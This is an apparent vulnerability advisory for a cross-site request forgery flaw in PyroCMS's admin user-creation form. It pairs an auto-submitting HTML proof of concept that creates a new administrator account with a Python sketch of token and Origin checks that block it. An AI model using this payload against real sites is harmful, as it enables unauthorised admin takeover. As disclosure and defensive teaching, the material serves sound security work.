Software: PyroCMS
Vulnerability: Cross-site Request Forgery
Tested On: Windows Vista + XAMPP
Date: 7/7/2010
The admin user-creation form in PyroCMS (index.php/admin/users/create) accepts a POST without any anti-CSRF token, so a cross-site request forgery can be exploited to create a new admin account when a logged-in administrator's browser loads an attacker-controlled page.
Proof of Concept
    <!-- Auto-submits a hidden form to the admin user-creation action; the browser attaches the victim admin's session cookie -->
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
            <input type="hidden" name="first_name" value="a" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="email" value="" />
            <input type="hidden" name="username" value="new_admin" />
            <input type="hidden" name="display_name" value="a" />
            <input type="hidden" name="group" value="admin" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="confirm_password" value="Password1" />
            <input type="hidden" name="btnAction" value="save" />
        </form>
    </body>
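The missing server-side check, as an added Python illustration (not PyroCMS code, which is PHP): a handler that trusts the session cookie alone, beside one that requires a per-session synchronizer token and checks the Origin header. The Session class, the handler functions and the csrf_token field name are assumptions; the form body mirrors the PoC's hidden fields.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

TOKEN_FIELD = "csrf_token"  # assumed hidden-field name, not a PyroCMS identifier


@dataclass
class Session:
    """Server-side session of the logged-in admin; the token lives here, not in the URL."""
    user: str
    is_admin: bool
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def create_user_vulnerable(session: Session, form: dict) -> str:
    """Trusts the session cookie alone: a cross-site form POST that the browser
    attaches the admin's cookie to (as in the PoC above) is accepted."""
    if not session.is_admin:
        return "forbidden"
    return f"created {form['username']} in group {form['group']}"


def create_user_protected(session: Session, form: dict,
                          origin: Optional[str], allowed_origin: str) -> str:
    """Synchronizer-token check plus an Origin check, run before any state changes."""
    if not session.is_admin:
        return "forbidden"
    # Modern browsers send Origin on cross-site form POSTs; reject foreign ones.
    if origin is not None and origin != allowed_origin:
        return "rejected: bad origin"
    # Constant-time compare; a missing token compares against "" and fails.
    if not hmac.compare_digest(form.get(TOKEN_FIELD, ""), session.csrf_token):
        return "rejected: missing or invalid csrf token"
    return f"created {form['username']} in group {form['group']}"


# Constructed request body mirroring the PoC's hidden fields (no token present).
POC_FORM = {"first_name": "a", "last_name": "a", "email": "", "username": "new_admin",
            "display_name": "a", "group": "admin", "active": "1", "password": "Password1",
            "confirm_password": "Password1", "btnAction": "save"}


def demo() -> tuple:
    """Returns (vulnerable result, protected result for the forged PoC request,
    protected result for a same-origin request carrying the session token)."""
    admin = Session(user="admin", is_admin=True)
    forged = create_user_protected(admin, POC_FORM, "http://attacker.invalid", "http://localhost")
    legit_form = {**POC_FORM, TOKEN_FIELD: admin.csrf_token}  # constructed legitimate submit
    legit = create_user_protected(admin, legit_form, "http://localhost", "http://localhost")
    return create_user_vulnerable(admin, POC_FORM), forged, legit
```

The vulnerable handler accepts the token-less PoC body as soon as the admin's session is present, while the protected one rejects it on the Origin check, or on the token check when no Origin header is sent.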